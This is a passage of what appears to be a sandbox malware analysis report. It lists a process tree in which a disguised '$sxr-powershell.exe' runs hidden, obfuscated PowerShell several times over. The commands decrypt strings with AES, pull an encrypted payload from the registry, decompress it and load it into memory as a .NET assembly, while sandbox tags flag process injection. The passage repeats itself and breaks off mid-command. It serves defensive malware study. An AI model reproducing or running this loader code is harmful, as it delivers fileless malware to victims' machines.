$DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5148
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4880
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3536).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:7152
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(7152).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = 